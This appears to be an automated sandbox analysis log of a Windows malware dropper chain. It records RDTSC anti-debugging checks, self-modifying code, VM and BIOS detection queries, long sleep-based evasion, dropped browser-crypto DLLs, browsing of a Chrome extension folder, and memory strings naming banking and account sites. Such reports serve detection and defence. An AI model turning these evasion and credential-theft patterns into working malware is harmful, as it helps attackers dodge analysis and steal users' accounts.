Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 53F0B7D second address: 53F0B83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 547010E second address: 5470126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 movsx edi, si 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF724EF309Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5470126 second address: 5470135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E9654Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5470135 second address: 5470174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724EF30A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF724EF30A1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF724EF309Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 5470174 second address: 547017A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 547017A second address: 547017E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	RDTSC instruction interceptor: First address: 54605A9 second address: 54605DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF724E96555h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dh, 42h 0x0000000f call 00007FF724E96554h 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Special instruction interceptor: First address: ACEB2A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Special instruction interceptor: First address: ACEBE9 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Special instruction interceptor: First address: C78684 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Special instruction interceptor: First address: C7EBC4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	Special instruction interceptor: First address: D02423 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: D9EB2A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: D9EBE9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: F48684 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: F4EBC4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: FD2423 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Special instruction interceptor: First address: 32FD25 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Special instruction interceptor: First address: 4E02FD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Special instruction interceptor: First address: 567FBF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Special instruction interceptor: First address: 41ECA2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	Special instruction interceptor: First address: 652B44 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Special instruction interceptor: First address: 81CE0C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Special instruction interceptor: First address: 9C0F60 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Special instruction interceptor: First address: 81A2F2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Special instruction interceptor: First address: 9EE648 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Special instruction interceptor: First address: 81CD1D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: CECA2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 302B44 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Special instruction interceptor: First address: F15F78 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Special instruction interceptor: First address: 10D3B28 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Special instruction interceptor: First address: F15F84 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	Special instruction interceptor: First address: 1155FBD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Special instruction interceptor: First address: 10EE2D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Special instruction interceptor: First address: 10C2BE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Special instruction interceptor: First address: 2DCE1F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Special instruction interceptor: First address: 2C6932 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	Special instruction interceptor: First address: 33D5E8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Special instruction interceptor: First address: 86DCFF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Special instruction interceptor: First address: 86DE20 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Special instruction interceptor: First address: 86B602 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Special instruction interceptor: First address: A46879 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Special instruction interceptor: First address: AAC78E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Special instruction interceptor: First address: 78FD25 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Special instruction interceptor: First address: 9402FD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Special instruction interceptor: First address: 9C7FBF instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe

Code function: 0_2_054607C6 rdtsc

0_2_054607C6

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 3138	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 3001	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5457
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3138
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3392
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3345

Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5DWsYef8WwGeGz5\Bunifu_UI_v1.5.3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1062157001\6e8173898b.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1062154001\ddea05ffa5.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\dll[1]	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[4].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5DWsYef8WwGeGz5\Y-Cleaner.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1062155001\f1410e5168.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\soft[1]	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	API coverage: 0.0 %
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	API coverage: 0.4 %

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8180	Thread sleep count: 95 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8180	Thread sleep time: -190095s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8184	Thread sleep count: 77 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8184	Thread sleep time: -154077s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 332	Thread sleep count: 93 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 332	Thread sleep time: -186093s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8168	Thread sleep count: 3138 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8168	Thread sleep time: -6279138s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5552	Thread sleep time: -32000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8156	Thread sleep count: 222 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8156	Thread sleep time: -6660000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5544	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8176	Thread sleep count: 3001 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8176	Thread sleep time: -6005001s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8188	Thread sleep count: 81 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 8188	Thread sleep time: -162081s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1364	Thread sleep count: 96 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1364	Thread sleep time: -192096s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe TID: 2168	Thread sleep time: -40020s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe TID: 1904	Thread sleep time: -38019s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe TID: 1840	Thread sleep time: -40020s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe TID: 1824	Thread sleep time: -40020s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe TID: 4040	Thread sleep time: -36018s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe TID: 4064	Thread sleep time: -54027s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe TID: 5460	Thread sleep count: 32 > 30
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe TID: 5460	Thread sleep time: -64032s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe TID: 7196	Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe TID: 7196	Thread sleep time: -76038s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe TID: 6356	Thread sleep time: -48024s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe TID: 6528	Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe TID: 6528	Thread sleep time: -66033s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5792	Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5792	Thread sleep time: -74037s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5520	Thread sleep count: 39 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5520	Thread sleep time: -78039s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4868	Thread sleep time: -48024s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4912	Thread sleep count: 220 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4912	Thread sleep time: -6600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6504	Thread sleep count: 38 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6504	Thread sleep time: -76038s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6208	Thread sleep time: -46023s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6536	Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6536	Thread sleep time: -68034s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6520	Thread sleep count: 36 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6520	Thread sleep time: -72036s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4912	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe TID: 4340	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe TID: 2708	Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe TID: 6276	Thread sleep count: 180 > 30
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe TID: 6276	Thread sleep time: -1080000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe TID: 8040	Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe TID: 5244	Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe TID: 7432	Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe TID: 4864	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe TID: 4628	Thread sleep time: -38019s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe TID: 5192	Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe TID: 5560	Thread sleep time: -44022s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe TID: 7676	Thread sleep time: -42021s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe TID: 4932	Thread sleep count: 164 > 30
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe TID: 4932	Thread sleep time: -984000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe TID: 7672	Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe TID: 1040	Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe TID: 7732	Thread sleep count: 226 > 30
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe TID: 7732	Thread sleep time: -1356000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe TID: 3720	Thread sleep time: -34017s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1020	Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5356	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7140	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8108	Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe TID: 2512	Thread sleep time: -90000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1062149001\eb74aeb58b.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1017589001\3f28c42ac4.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1062151001\8f4d1353d2.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1062150001\1f1ada1ce1.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\0xqfQZufeQ.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017588001\8166ff9922.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017590001\382cd038a3.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe

Code function: 8_2_6C45C930 GetSystemInfo,VirtualAlloc,GetSystemInfo,VirtualFree,VirtualAlloc,

8_2_6C45C930

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017587001\0f39a8c7db.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005795000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696494690p
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: 0f39a8c7db.exe, 00000019.00000002.2723505102.00000000015CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareF
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: 1f1ada1ce1.exe, 00000018.00000003.2356316023.0000000005790000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
